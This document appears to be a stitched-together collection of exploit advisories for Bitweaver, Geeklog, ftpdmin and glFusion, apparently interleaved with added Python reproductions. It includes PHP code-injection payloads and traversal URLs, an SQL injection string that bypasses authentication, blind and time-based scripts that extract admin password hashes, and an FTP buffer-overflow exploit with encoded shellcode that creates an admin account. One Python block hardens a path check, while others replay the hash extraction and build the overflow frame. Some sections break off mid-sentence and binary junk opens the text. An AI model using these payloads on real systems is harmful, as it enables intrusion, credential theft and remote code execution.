        "\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f".
        "\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00".
Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit
<?php
/*
Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit
by Nine:Situations:Group::bookoo
php.ini independent

site: http://retrogod.altervista.org/
software site: http://www.bitweaver.org/

You need a user account, and you need to change your display name to:

{php}passthru($_SERVER['HTTP_CMD']);{/php}

Register and click on Preferences, open the User Information tab, write the code
above inside the Real name text field, then click on Change.

Google dorks:
by bitweaver Version powered +boards
You are running bitweaver in TEST mode|bitweaver * White Screen of Death

Versions tested: 2.6.0, 2.0.2

Vulnerability type: folder creation, file creation, file overwrite, PHP code injection.

Explanation: look at /boards/boards_rss.php, line 102:

...
echo $rss->saveFeed( $rss_version_name, $cacheFile );
...

It calls saveFeed() in an insecure way: its arguments are built from the
$_REQUEST['version'] variable and may contain directory traversal sequences.
Now look at saveFeed() in /rss/feedcreator.class.php:

...
function saveFeed($filename="", $displayContents=true) {
    if ($filename=="") {
        $filename = $this->_generateFilename();
    }
    if ( !is_dir( dirname( $filename ))) {
        mkdir_p( dirname( $filename ));
    }
    $feedFile = fopen($filename, "w+");
    if ($feedFile) {
        fputs($feedFile,$this->createFeed());
        fclose($feedFile);
        if ($displayContents) {
            $this->_redirect($filename);
        }
    } else {
        echo "<br /><b>Error creating feed file, please check write permissions.</b><br />";
    }
}
...

Regardless of php.ini settings you can create arbitrary folders and create or
overwrite files; by passing a null char you can also end the path with an
arbitrary extension other than .xml, e.g.:

http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo.php%00

Now you have a bookoo.php in the main folder:

<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<?xml-stylesheet href="http://www.w3.org/2000/08/w3c-synd/style.css" type="text/css"?>
<rss version="0.91">
<channel>
<title>Feed</title>
<description></description>
<link>http://192.168.0.1</link>
<lastBuildDate>Sat, 09 May 2009 20:01:44 +0100</lastBuildDate>
<generator>FeedCreator 1.7.2</generator>
<language>en-us</language>
</channel>
</rss>

You could inject PHP code through the Host header (it ends up inside the <link>
tag, but the header is also used to build filenames, which creates problems, and
most servers will answer with an HTTP error) or through your display name, which
ends up inside the <title> tag, e.g.:

http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo_ii.php%00&u=bookoo&p=password

and here is the new file (if your display name is <?php passthru($_GET['cmd']); ?>):

<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<?xml-stylesheet href="http://www.w3.org/2000/08/w3c-synd/style.css" type="text/css"?>
<rss version="0.91">
<channel>
<title>Feed (<?php passthru($_GET['cmd']); ?>)</title>
<description></description>
<link>http://192.168.0.1</link>
<lastBuildDate>Tue, 12 May 2009 00:30:54 +0100</lastBuildDate>
<generator>FeedCreator 1.7.2</generator>
<language>en-us</language>
</channel>
</rss>

If short_open_tag is off in php.ini (with short_open_tag = on the <?xml ... ?>
preamble is parsed as PHP and produces a parse error) you can now launch commands:

http://host/path_to_bitweaver/bookoo_ii.php?cmd=ls

To get around short_open_tag = on you can inject into a template file instead, e.g.:

http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../themes/templates/footer_inc.tpl%00&u=bookoo&p=password

Now footer_inc.tpl looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<?xml-stylesheet href="http://www.w3.org/2000/08/w3c-synd/style.css" type="text/css"?>
<rss version="0.91">
<channel>
<title>Feed ({php}passthru($_GET['CMD']);{/php})</title>
<description></description>
<link>http://192.168.0.1</link>
<lastBuildDate>Tue, 12 May 2009 00:43:01 +0100</lastBuildDate>
<generator>FeedCreator 1.7.2</generator>
<language>en-us</language>
</channel>
</rss>

Note that the shellcode is in Smarty template syntax. Now you can launch commands
from the main page:

http://host/path_to_bitweaver/index.php?cmd=ls%20-la
or
http://host/path_to_bitweaver/wiki/index.php?cmd=ls%20-la

Additional notes: without an account you can still cause a denial of service
condition, e.g. by overwriting the main index.php:

http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../index.php%00

I also found a bug in the Smarty template system,
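The hardening that saveFeed() lacks, as an added example (not Bitweaver code): the feed version is checked against a whitelist, and independently of that the resolved path is forced to stay under the cache directory and NUL bytes are rejected, so neither the traversal nor the %00 extension trick of the PoC reaches fopen(). The cache directory, the version names and the "<version>.xml" naming are assumptions for the demo.

```python
import os
import re

# Assumed layout (hypothetical; Bitweaver's real cache directory and version
# names may differ): feeds are cached as <CACHE_DIR>/<version>.xml.
CACHE_DIR = "/var/www/bitweaver/temp/rss"
KNOWN_VERSIONS = {"RSS0.91", "RSS1.0", "RSS2.0", "ATOM"}
_SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


class UnsafeFeedPath(ValueError):
    """Raised for any version value that must not reach the filesystem."""


def resolve_under(base_dir, relative_name):
    """Join and resolve, then refuse anything that lands outside base_dir.

    This is the containment check the original saveFeed() lacks: it holds even
    for a name that slipped past the whitelist, because '..' (and a leading '/')
    are collapsed by realpath() before the comparison is made.
    """
    if "\x00" in relative_name:
        raise UnsafeFeedPath("embedded NUL byte")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative_name))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows
        inside = False
    if not inside:
        raise UnsafeFeedPath("path escapes the cache directory")
    return candidate


def escapes(base_dir, relative_name):
    """True when resolve_under() would refuse the name."""
    try:
        resolve_under(base_dir, relative_name)
    except UnsafeFeedPath:
        return True
    return False


def safe_cache_path(version, cache_dir=CACHE_DIR):
    """Cache file for a feed version: whitelist first, containment second, fixed extension."""
    if version not in KNOWN_VERSIONS or not _SAFE_NAME.match(version):
        raise UnsafeFeedPath("unknown feed version")
    return resolve_under(cache_dir, version + ".xml")


def is_traversal_attempt(version):
    """True for values the hardened builder rejects; a usable log/alert signal."""
    try:
        safe_cache_path(version)
    except UnsafeFeedPath:
        return True
    return False
```

The whitelist alone would stop the PoC; the realpath/commonpath check is there so that a later change to the naming scheme cannot silently reopen the hole.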
Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
<?php
/*
Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/
software site: http://www.geeklog.net/

PHP and MySQL version independent vulnerability, see usersettings.php near lines 1467 - 1480:

...
if (isset ($_USER['uid']) && ($_USER['uid'] > 1)) {
    switch ($mode) {
    case 'saveuser':
        savepreferences ($_POST);
        $display .= saveuser($_POST);
        PLG_profileExtrasSave ();
        break;
    case 'savepreferences':
        savepreferences ($_POST);
        $display .= COM_refresh ($_CONF['site_url'] . '/usersettings.php?mode=preferences&amp;msg=6');
        break;
...

All the $_POST[] variables are passed to the savepreferences() function; now look
at that function, again in usersettings.php:

...
function savepreferences($A)
{
    global $_CONF, $_TABLES, $_USER;

    if (isset ($A['noicons']) && ($A['noicons'] == 'on')) {
        $A['noicons'] = 1;
    } else {
        $A['noicons'] = 0;
    }
    if (isset ($A['willing']) && ($A['willing'] == 'on')) {
        $A['willing'] = 1;
    } else {
        $A['willing'] = 0;
    }
    if (isset ($A['noboxes']) && ($A['noboxes'] == 'on')) {
        $A['noboxes'] = 1;
    } else {
        $A['noboxes'] = 0;
    }
    if (isset ($A['emailfromadmin']) && ($A['emailfromadmin'] == 'on')) {
        $A['emailfromadmin'] = 1;
    } else {
        $A['emailfromadmin'] = 0;
    }
    if (isset ($A['emailfromuser']) && ($A['emailfromuser'] == 'on')) {
        $A['emailfromuser'] = 1;
    } else {
        $A['emailfromuser'] = 0;
    }
    if (isset ($A['showonline']) && ($A['showonline'] == 'on')) {
        $A['showonline'] = 1;
    } else {
        $A['showonline'] = 0;
    }

    $A['maxstories'] = COM_applyFilter ($A['maxstories'], true);
    if (empty ($A['maxstories'])) {
        $A['maxstories'] = 0;
    } else if ($A['maxstories'] > 0) {
        if ($A['maxstories'] < $_CONF['minnews']) {
            $A['maxstories'] = $_CONF['minnews'];
        }
    }

    $TIDS = @array_values($A[$_TABLES['topics']]);
    $AIDS = @array_values($A['selauthors']);
    $BOXES = @array_values($A[{$_TABLES['blocks']}]); // <- this is $_POST[(prefix)blocks]
    $ETIDS = @array_values($A['etids']);

    $tids = '';
    if (sizeof ($TIDS) > 0) {
        $tids = addslashes (implode (' ', $TIDS));
    }
    $aids = '';
    if (sizeof ($AIDS) > 0) {
        $aids = addslashes (implode (' ', $AIDS));
    }

    $selectedblocks = '';
    if (count ($BOXES) > 0) {
        $boxes = addslashes (implode (',', $BOXES)); // <-- this addslashes() is totally useless
        // SQL INJECTION HERE *** $boxes is not surrounded by quotes!
        $blockresult = DB_query("SELECT bid,name FROM {$_TABLES['blocks']} WHERE bid NOT IN ($boxes)");
        $numRows = DB_numRows($blockresult);
        for ($x = 1; $x <= $numRows; $x++) {
            $row = DB_fetchArray ($blockresult);
            if ($row['name'] <> 'user_block' AND $row['name'] <> 'admin_block' AND $row['name'] <> 'section_block') {
                $selectedblocks .= $row['bid'];
                if ($x < $numRows) {
                    $selectedblocks .= ' ';
                }
            }
        }
    }
...

Read the commented lines! This tool extracts the admin hash from the database by
asking MySQL true/false questions and interpreting the block checkboxes that come
back in the response; it requires a simple user account.

Vulnerability ii, information disclosure: the table prefix is shown inside the HTML,
because the form field names are built from the $_TABLES[] array.
*/

$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extension loaded!";

if (php_sapi_name() <> "cli") {
    die($err[0]);
}

if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : null;
    } else {
        !dl("php_curl.so") ? die($err[1]) : null;
    }
}

function syntax()
{
    global $argv;
    print ("Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS] \n".
           "Options: \n".
           "--c:[uid:hash]        - use your user cookie, instead of user/pwd pair \n".
           "--port:[port]         - specify a port \n".
           "                        default-80 \n".
           "--uid:[n]             - specify an uid other than default (2, usually admin)\n".
           "--proxy:[host:port]   - use proxy \n".
           "--skiptest            - skip preliminary tests \n".
           "--test                - run only tests \n".
           "Examples: php ".$argv[0]." 192.168.0.1 /geeklog/ bookoo pass \n".
           "          php ".$argv[0]." 192.168.0.1 / bookoo pass --proxy:1.1.1.1:8080\n".
           "          php ".$argv[0].
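The blind extraction the advisory describes, replayed as an added example (not the advisory's tool and not Geeklog code). One blocks[] element closes the NOT IN (...) list, appends a true/false question about one byte of the target's passwd, and reopens the list; the page's "checkboxes ticked" answer is simply "rows returned" here. The question is asked against an in-memory SQLite copy of the two tables with constructed rows and a hypothetical hash; SQLite spells the probe unicode(substr()), MySQL would be ASCII(SUBSTRING()), everything else is the same, and because the payload carries no quotes the addslashes() call never touches it.

```python
import sqlite3

HEX = "0123456789abcdef"
TARGET_UID = 2
SEEDED_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # constructed: md5("password")


def setup_db():
    """In-memory stand-in for gl_blocks / gl_users, with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE gl_blocks (bid INTEGER, name TEXT);"
        "CREATE TABLE gl_users (uid INTEGER, passwd TEXT);"
        "INSERT INTO gl_blocks VALUES (1,'whats_new_block'),(2,'poll_block'),(3,'older_stories');"
        f"INSERT INTO gl_users VALUES (1,'anon'),({TARGET_UID},'{SEEDED_HASH}');"
    )
    return db


def blocks_payload(pos, lo, hi, uid=TARGET_UID):
    """One blocks[] element: closes NOT IN (...), asks whether the byte at `pos`
    of the target's passwd lies in [lo, hi], and reopens the list so the rest of
    the statement still parses. No quotes, so addslashes() is a no-op on it."""
    probe = f"(SELECT unicode(substr(passwd,{pos},1)) FROM gl_users WHERE uid={uid})"
    return f"0) AND {probe} BETWEEN {lo} AND {hi} OR bid IN (0"


def vulnerable_query(db, boxes):
    """Mirror of savepreferences(): implode(',') then unquoted interpolation."""
    joined = ",".join(boxes)
    sql = f"SELECT bid,name FROM gl_blocks WHERE bid NOT IN ({joined})"
    return db.execute(sql).fetchall()


def oracle(db, pos, lo, hi):
    """True when the condition held: the page would come back with every block ticked."""
    return len(vulnerable_query(db, [blocks_payload(pos, lo, hi)])) > 0


def extract_hash(db, length=32):
    """Recover the hex hash one digit at a time, four yes/no questions per digit
    (binary search over the 16 hex characters, which are sorted by code point)."""
    recovered = []
    for pos in range(1, length + 1):
        lo, hi = 0, len(HEX) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, pos, ord(HEX[lo]), ord(HEX[mid])):
                hi = mid
            else:
                lo = mid + 1
        recovered.append(HEX[lo])
    return "".join(recovered)
```

Against a real target the only part that changes is oracle(): it posts the element as (prefix)blocks[] and reads the checkbox state from the returned preferences form instead of counting rows.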
ftpdmin v. 0.96 RNFR remote buffer overflow exploit
<?php
/*
ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
by Nine:Situations:Group::surfista

software site: http://www.sentex.net/~mwandel/ftpdmin/
our site: http://retrogod.altervista.org/

Bug found by rgod in 2006: RNFR sequences can trigger a simple EIP overwrite.
We can use 272 bytes before EIP and 119 after EIP; ESP and EBP point to the
second memory region. We have a very small set of usable chars: the RNFR
(Rename From) command accepts a pathname as its argument, so characters whose
integer representation is in the range 0 through 31, and reserved chars, are
not allowed!
*/
error_reporting(7);

$ftp_server = "192.168.0.1";
$ftp_user = "anonymous";
$ftp_pass = "a...@email.com";

function ftp_cmd($cmd){
    global $conn_id;
    echo "- ".$cmd."\n";
    $buff=ftp_raw($conn_id,$cmd);
}

#WinExec shellcode of mine, encoded with the alpha2 tool by SkyLined, adds
#a surfista admin user with pass pass
#contains hardcoded address, re-encode command:
#alpha2 esp < shdmp.txt
$scode="TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI".
"Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5".
"prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN".
"w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw".
"4gPqcpupr3VQybSrTE1kOA";

#do not touch, esp adjustment and subsequent call esp, very large but we have lots of unused space
$code ="TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI".
"NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA";

if (strlen($scode) > 272) {die("[!] shellcode too large!");}

$conn_id = ftp_connect($ftp_server) or die("(!) Unable to connect to $ftp_server");

if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
    echo "(*) Connected as $ftp_user@$ftp_server\n";
} else {
    die("(!) Unable to connect as $ftp_user\n");
}

$jnk = str_repeat("\x66",272 - strlen($scode));
$eip="\x44\x3a\x41\x7e"; //0x7E413A44 jmp esp, user32.dll xp sp3
$jnk_ii = str_repeat("\x66",119 - strlen($code));
$bof=$scode.$jnk.$eip.$code.$jnk_ii;

$boom="RNFR ".str_repeat("x",0x0096); ftp_cmd($boom);
$boom="RNFR ".$bof;                    ftp_cmd($boom);
$boom="RNFR ".str_repeat("x",0x0208); ftp_cmd($boom);

ftp_close($conn_id);
echo "(*) Done !\n";
?>

url: http://retrogod.altervista.org/9sg_ftpdmin_096_rnfr_bof.html
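The frame layout and the character constraint the advisory describes, as an added example (not the advisory's exploit): 272 bytes before the saved return address, the 4-byte address, then the 119 bytes ESP points at, with a check that nothing in the frame is a byte a pathname argument cannot carry. Control characters 0x00-0x1f are rejected unconditionally; the page does not list ftpdmin's reserved set, so that is a parameter. The return address is the one quoted on the page; the alphanumeric stage strings in the test are placeholders taken from the page's alpha2 decoder prefix, not runnable shellcode.

```python
BEFORE_EIP = 272  # bytes before the saved return address
AFTER_EIP = 119   # bytes after it; ESP points here when the overflowed frame returns
JMP_ESP_USER32_XPSP3 = bytes.fromhex("443a417e")  # 0x7E413A44 jmp esp, little-endian
FRAME_LEN = BEFORE_EIP + 4 + AFTER_EIP


def pathname_illegal(buf, reserved=b""):
    """Bytes the RNFR argument cannot carry, sorted: control characters 0x00-0x1f
    (CR/LF end the command line, NUL ends the string) plus whatever extra set the
    caller knows the server rejects; the page does not list that set."""
    return sorted({b for b in buf if b < 0x20 or b in reserved})


def build_rnfr_overflow(stage1, stage2, ret=JMP_ESP_USER32_XPSP3, fill=b"f", reserved=b""):
    """Lay out [stage1 | fill][ret][stage2 | fill] and refuse any illegal byte."""
    if len(ret) != 4:
        raise ValueError("return address must be 4 bytes")
    if len(stage1) > BEFORE_EIP:
        raise ValueError("shellcode too large for the region before EIP")
    if len(stage2) > AFTER_EIP:
        raise ValueError("stager too large for the region after EIP")
    frame = stage1.ljust(BEFORE_EIP, fill) + ret + stage2.ljust(AFTER_EIP, fill)
    bad = pathname_illegal(frame, reserved)
    if bad:
        raise ValueError("pathname-illegal bytes: " + " ".join(f"{b:#04x}" for b in bad))
    return frame


def eip_offset(frame, ret=JMP_ESP_USER32_XPSP3):
    """Where the return address sits in a frame (-1 if absent); sanity check before sending."""
    return frame.find(ret)


def rnfr_commands(frame):
    """The three RNFR lines the page's exploit sends, in order."""
    return [b"RNFR " + b"x" * 0x96, b"RNFR " + frame, b"RNFR " + b"x" * 0x208]
```

Note that the page's return address contains 0x3a (':'), so ':' cannot be in ftpdmin's reserved set even though it is reserved in Windows file names; that is why the check takes the reserved set from the caller instead of assuming the Windows list.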
Geeklog <= 1.5.2 'SESS_updateSessionTime()' vulnerability
As the vendor stated (see http://www.geeklog.net/article.php/geeklog-1.5.2sr2), Geeklog is also vulnerable to the issue tracked at http://www.securityfocus.com/bid/34361/info; that entry should actually be renamed "glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability".
Geeklog <= 1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit
<?php
/*
Geeklog <= 1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit
by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/
software site: http://www.geeklog.net/

Credit goes to rgod, who found the bug more than a year ago.
Working against PHP >= 5.0.

google dorks:
By Geeklog Created this page in +seconds +powered
By Geeklog Created this page in +seconds +powered inurl:public_html

Vulnerability, see /public_html/webservices/atom/index.php near lines 34-53:

...
require_once '../../lib-common.php';

if (PHP_VERSION < 5) {
    $_CONF['disable_webservices'] = true;
} else {
    require_once $_CONF['path_system'] . '/lib-webservices.php';
}

if ($_CONF['disable_webservices']) {
    COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
}

header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');

WS_authenticate();
...

Now the WS_authenticate() function in /system/lib-webservices.php near lines 780-877:

...
function WS_authenticate()
{
    global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;

    $uid = '';
    $username = '';
    $password = '';
    $status = -1;

    if (isset($_SERVER['PHP_AUTH_USER'])) {
        $username = $_SERVER['PHP_AUTH_USER'];
        $password = $_SERVER['PHP_AUTH_PW'];
        if ($WS_VERBOSE) {
            COM_errorLog("WS: Attempting to log in user '$username'");
        }
    } elseif (!empty($_SERVER['REMOTE_USER'])) {
        list($auth_type, $auth_data) = explode(' ', $_SERVER['REMOTE_USER']);
        list($username, $password) = explode(':', base64_decode($auth_data));
        if ($WS_VERBOSE) {
            COM_errorLog("WS: Attempting to log in user '$username' (via \$_SERVER['REMOTE_USER'])");
        }
    } else {
        if ($WS_VERBOSE) {
            COM_errorLog("WS: No login given");
        }
    }
...

and after, near lines 907-909:

...
    if (($status == -1) && $_CONF['user_login_method']['standard']) {
        $status = SEC_authenticate($username, $password, $uid);
    }
...

Now open /system/lib-security.php near lines 695-717:

...
function SEC_authenticate($username, $password, &$uid)
{
    global $_CONF, $_TABLES, $LANG01;

    $result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))"); //--- SQL INJECTION HERE
    $tmp = DB_error();
    $nrows = DB_numRows($result);

    if (($tmp == 0) && ($nrows == 1)) {
        $U = DB_fetchArray($result);
        $uid = $U['uid'];
        if ($U['status'] == USER_ACCOUNT_DISABLED) {
            // banned, jump to here to save an md5 calc.
            return USER_ACCOUNT_DISABLED;
        } elseif ($U['passwd'] != SEC_encryptPassword($password)) {
            return -1; // failed login
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
            return USER_ACCOUNT_AWAITING_APPROVAL;
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) {
            // Awaiting user activation, activate:
            DB_change($_TABLES['users'], 'status', USER_ACCOUNT_ACTIVE, 'username', $username);
            return USER_ACCOUNT_ACTIVE;
        } else {
            return $U['status']; // just return their status
        }
    } else {
        $tmp = $LANG01[32] . ": '" . $username . "'";
        COM_errorLog($tmp, 1);
        return -1;
    }
}
...

You can inject SQL code in the 'username' argument of this function; it may come
from the $_SERVER['PHP_AUTH_USER'] or $_SERVER['REMOTE_USER'] PHP variables.
These vars are used for both the HTTP Basic and Digest authentication methods,
see the PHP manual: http://www.php.net/manual/en/features.http-auth.php

Manual poc: visit http://host/path_to_geeklog/webservices/atom/index.php and at
the authentication prompt type:

username: ' AND 0 UNION SELECT 3,MD5(''),null,2 FROM gl_users LIMIT 1/*
password: (empty)

The authentication mechanism is bypassed! Note that it is passed base64_encode()'d!

Now you have access to some dangerous functions:

service_submit_staticpages()
service_delete_staticpages()
service_get_staticpages()
service_getTopicList_staticpages()
in /plugins/staticpages/services.inc.php

service_submit_story()
service_delete_story()
service_get_story()
service_getTopicList_story()
in /system/lib-story.php

e.g. the service_submit_staticpages() one allows a dangerous sp_php flag to be specified when submitting staticpages; if the staticpages.PHP permission is set to true for the staticpage admin (not the default), the page will be
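The PHP_AUTH_USER injection replayed against SQLite, beside the parameterized query that closes it, as an added example (not Geeklog code). The advisory's username makes the statement return a fabricated row: status 3 (active), passwd = MD5 of the empty string, uid 2, with the rest commented out, so the password comparison passes for an empty password. The table content is constructed (hypothetical admin hash), MD5() is registered as a SQLite function because SQLite has none, and the two Basic-auth helpers show the base64 wrapping the advisory mentions.

```python
import base64
import hashlib
import sqlite3

USER_ACCOUNT_ACTIVE = 3  # the status value the advisory's payload fabricates
ADVISORY_USERNAME = "' AND 0 UNION SELECT 3,MD5(''),null,2 FROM gl_users LIMIT 1/*"
QUERY = ("SELECT status, passwd, email, uid FROM gl_users WHERE username=%s "
         "AND ((remoteservice is null) or (remoteservice = ''))")


def sec_encrypt_password(password):
    """Geeklog 1.5 stores the plain MD5 of the password (what the payload relies on)."""
    return hashlib.md5(password.encode()).hexdigest()


def setup_db():
    """In-memory gl_users with one constructed admin row; MD5() added since SQLite lacks it."""
    db = sqlite3.connect(":memory:")
    db.create_function("MD5", 1, sec_encrypt_password)
    db.execute("CREATE TABLE gl_users (uid INTEGER, username TEXT, passwd TEXT, "
               "email TEXT, status INTEGER, remoteservice TEXT)")
    db.execute("INSERT INTO gl_users VALUES (?,?,?,?,?,?)",
               (2, "Admin", sec_encrypt_password("n0tTheRealOne"),
                "admin@example.invalid", USER_ACCOUNT_ACTIVE, None))
    return db


def sec_authenticate(db, username, password, parameterized=False):
    """Port of the decision logic of SEC_authenticate(): (status, uid) or (-1, None).

    parameterized=False builds the statement by string concatenation exactly as
    the PHP does; parameterized=True binds the username instead, so the quote in
    it is data and the UNION never happens.
    """
    if parameterized:
        rows = db.execute(QUERY % "?", (username,)).fetchall()
    else:
        rows = db.execute(QUERY % ("'" + username + "'")).fetchall()
    if len(rows) != 1:
        return -1, None
    status, passwd, _email, uid = rows[0]
    if passwd != sec_encrypt_password(password):
        return -1, None
    return status, uid


def basic_auth_header(username, password):
    """What the browser sends after the prompt: base64(user:pass)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return "Authorization: Basic " + token


def decode_basic(header_value):
    """Server side: what $_SERVER['PHP_AUTH_USER'] and PHP_AUTH_PW end up holding."""
    user, _, pw = base64.b64decode(header_value.split()[-1]).decode().partition(":")
    return user, pw
```

SQLite treats an unterminated /* as a comment to end of input just as MySQL does, which is what lets the trailing AND ((remoteservice ...)) clause disappear.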
glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit
<?php
/*
glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit
by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/
software site: http://www.glfusion.org/

google dork: Page created in seconds by glFusion +RSS

Found another vector of injection in /private/system/lib-session.php near lines 97-117:

...
if (isset ($_COOKIE[$_CONF['cookie_session']])) {
    $sessid = COM_applyFilter ($_COOKIE[$_CONF['cookie_session']]);
    if ($_SESS_VERBOSE) {
        COM_errorLog("got $sessid as the session id from lib-sessions.php",1);
    }
    $userid = SESS_getUserIdFromSession($sessid, $_CONF['session_cookie_timeout'], $_SERVER['REMOTE_ADDR'], $_CONF['cookie_ip']);
    if ($_SESS_VERBOSE) {
        COM_errorLog("Got $userid as User ID from the session ID",1);
    }
    if ($userid > 1) {
        // Check user status
        $status = SEC_checkUserStatus($userid);
        if (($status == USER_ACCOUNT_ACTIVE) || ($status == USER_ACCOUNT_AWAITING_ACTIVATION)) {
            $user_logged_in = 1;
            SESS_updateSessionTime($sessid, $_CONF['cookie_ip']);
...

See the SESS_updateSessionTime() function near lines 418-436:

...
function SESS_updateSessionTime($sessid, $md5_based=0)
{
    global $_TABLES;

    $newtime = (string) time();

    if ($md5_based == 1) {
        $sql = "UPDATE {$_TABLES['sessions']} SET start_time=$newtime WHERE (md5_sess_id = '$sessid')";
    } else {
        $sql = "UPDATE {$_TABLES['sessions']} SET start_time=$newtime WHERE (sess_id = $sessid)"; // SQL INJECTION HERE
    }

    $result = DB_query($sql);

    return 1;
}
...

If the session id is not md5() hashed in the general configuration, which is the
default, you can inject arbitrary SQL statements. Note that the query in the
SESS_getUserIdFromSession() function:

...
if ($md5_based == 1) {
    $sql = "SELECT uid FROM {$_TABLES['sessions']} WHERE "
         . "(md5_sess_id = '$sessid') AND (start_time > $mintime) AND (remote_ip = '$remote_ip')";
} else {
    $sql = "SELECT uid FROM {$_TABLES['sessions']} WHERE "
         . "(sess_id = '$sessid') AND (start_time > $mintime) AND (remote_ip = '$remote_ip')";
}
...

compares the supplied sessid value with the sess_id column of the sessions table,
which is an integer. MySQL, like PHP, only considers the leading integer part of
the supplied string when comparing them. So the function returns a valid userid
and, if you know an existing sessid in the table, you can inject queries through
the cookie, like this:

Cookie: glf_session=12345678 [SQL HERE]; glfusion=99;

This tool uses delays to extract an admin hash from the users table, but needs a
simple user account; some improvement in find_prefix(); working against
MySQL >= 5.0.12, where the SLEEP() function is available, or ... if you find
another solution for delays, against MySQL >= 4.1, which supports SELECT
subqueries (BENCHMARK() cannot be used because commas are filtered by the
COM_applyFilter() function).
*/

$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extension loaded!";

if (php_sapi_name() <> "cli") {
    die($err[0]);
}

if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : null;
    } else {
        !dl("php_curl.so") ? die($err[1]) : null;
    }
}

function syntax()
{
    global $argv;
    print ("Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS] \n".
           "Options: \n".
           "--port:[port]         - specify a port \n".
           "                        default-80 \n".
           "--prefix              - try to extract table prefix from information.schema\n".
           "                        default-gl_ \n".
           "--uid:[n]             - specify an uid other than default (2, usually admin)\n".
           "--proxy:[host:port]   - use proxy \n".
           "--verbose             - show more information \n".
           "--skiptest            - skip preliminary tests \n".
           "--test                - run only tests \n".
           "Examples: php ".$argv[0]." 192.168.0.1 /glfusion/ bookoo pass \n".
           "          php ".$argv[0]." 192.168.0.1 / bookoo pass --prefix --proxy:1.1.1.1:8080\n".
           "          php ".$argv[0]." 192.168.0.1 / bookoo pass --prefix --uid:3");
    die();
}

error_reporting(E_ALL ^ E_NOTICE);

$host = $argv[1];
$path = $argv[2];
$_user = $argv[3];
$_pwd = $argv[4];
$prefix = "gl_";
glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit
<?php
/*
glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit
by Nine:Situations:Group::bookoo

working against MySQL >= 4.1
php.ini independent

our site: http://retrogod.altervista.org/
software site: http://www.glfusion.org/

google dork: Page created in seconds by glFusion +RSS

Vulnerability: sql injection in the 'order' and 'direction' arguments. Look at
the ExecuteQueries() function in /private/system/classes/listfactory.class.php,
near line 336:

...
// Get the details for sorting the list
$this->_sort_arr['field'] = isset($_REQUEST['order']) ? COM_applyFilter($_REQUEST['order']) : $this->_def_sort_arr['field'];
$this->_sort_arr['direction'] = isset($_REQUEST['direction']) ? COM_applyFilter($_REQUEST['direction']) : $this->_def_sort_arr['direction'];
if (is_numeric($this->_sort_arr['field'])) {
    $ord = $this->_def_sort_arr['field'];
    $this->_sort_arr['field'] = SQL_TITLE;
} else {
    $ord = $this->_sort_arr['field'];
}
